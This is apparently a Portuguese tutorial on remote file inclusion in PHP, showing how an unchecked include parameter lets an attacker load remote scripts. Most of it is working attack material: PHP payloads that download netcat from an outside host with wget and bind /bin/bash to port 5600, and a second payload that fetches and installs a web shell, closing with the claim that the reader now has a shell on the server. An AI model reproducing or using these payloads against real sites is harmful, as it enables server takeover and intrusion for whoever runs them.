É pornograficamente importante restringirmos as informações que usamos pelos nossos códigos para os usuários finais, e atentarmos que as informações que são geradas por um lado PODE (e nossos códigos são originalmente projetados para isso) ser recebida por outro lado, mas esse último (no caso um script que processa alguma informação) pode ser "enganado" por dados gerados pelo lado do usuário. Constantemente as funções include(), require() e fopen() são utilizadas por muitos programadores devido a flexibilidade que ele proporciona no desenvolvimento, mas a utilização destas funções, assim como a configuração das variáveis globais no servidor é fundamental para manter um nível de segurança aceitável.
Imagine agora o seguinte exemplo:
http://host.com.br/index.php?include=corpo.htm
Se nesse caso é permitido o uso de barras, e/ou é permitido include de arquivos remotos, e/ou não é verificada a extensão do arquivo passado por $_GET['include'] para a função include esse site certamente aceita atravessamentos.
Vejamos um exemplo de ataque:
http://host.com.br/index.php?include=meu_host/planta_netcat.php
Agora o código de planta_netcat.php:
<?php
system("wget host_qualquer/nc");
system("./nc -l -p 5600 -e /bin/bash");
?>
OBS: O
netcat é um utilitário de networking em geral que lê e escreve dados usando o protocolo de TCP/IP. Ele foi projetado para ser uma ferramenta "back-end" de confiança que pode ser usada diretamente ou facilmente ser dirigida por outros programas e certificados.
Ao mesmo tempo, é uma poderosa ferramenta para debugação e exploração de redes, porque ela pode criar quase qualquer tipo da conexão que você necessitaria e tem diversas potencialidades interessantes já built-in. E atualmente ele fornece o acesso às seguintes características principais:
- Conexões outbound e inbound, TCP ou UDP, para ou de qualquer porta.
- Features de tunelamento UDP e TCP, com a possibilidade de especificar todos os parâmetros de rede (a porta fonte/interface e porta/interface de escuta, e o anfitrião remoto reservado para conectar ao túnel).
- Port-scanning built-in aleatório. Entre outras características.
Mas no nosso exemplo do
planta_netcat.php, estamos bindando o bash e fazendo com que ele fique escutando na porta 5600, ou seja, teremos uma "shell" na porta 5600.
Vejamos outro exemplo:
http://host.com.br/index.php?include=meu_host/planta_backdoor.php
Agora vejamos
planta_backdoor.php:
<?php
// Evitando extensão .php para prevenir que o wget
// não baixe a saída de ssh_cli.php, se isso ocorrer
// devido o host origem suportar php o ssh_cli é
// baixado no servidor de origem e não no servidor de destino
system("wget host_qualquer/ssh_cli");
system("mv ssh_cli ssh_cli.php");
?>
Agora o código do ssh_cli:
<?php
echo '<pre>';
// Mostra todo o resultado do comando do shell "ls", e retorna
// a última linha da saída em $last_line. Guarda o valor de retorno
// do comando shell em $retval.
$last_line = system('ls', $retval);
// Mostrando informação adicional
echo '
</pre>
<hr>Última linha da saída: '.$last_line.'
<hr>Valor de Retorno: '.$retval;
?>
Pronto, agora você já tem uma shell, ou seja, uma conta para explorar falhas locais.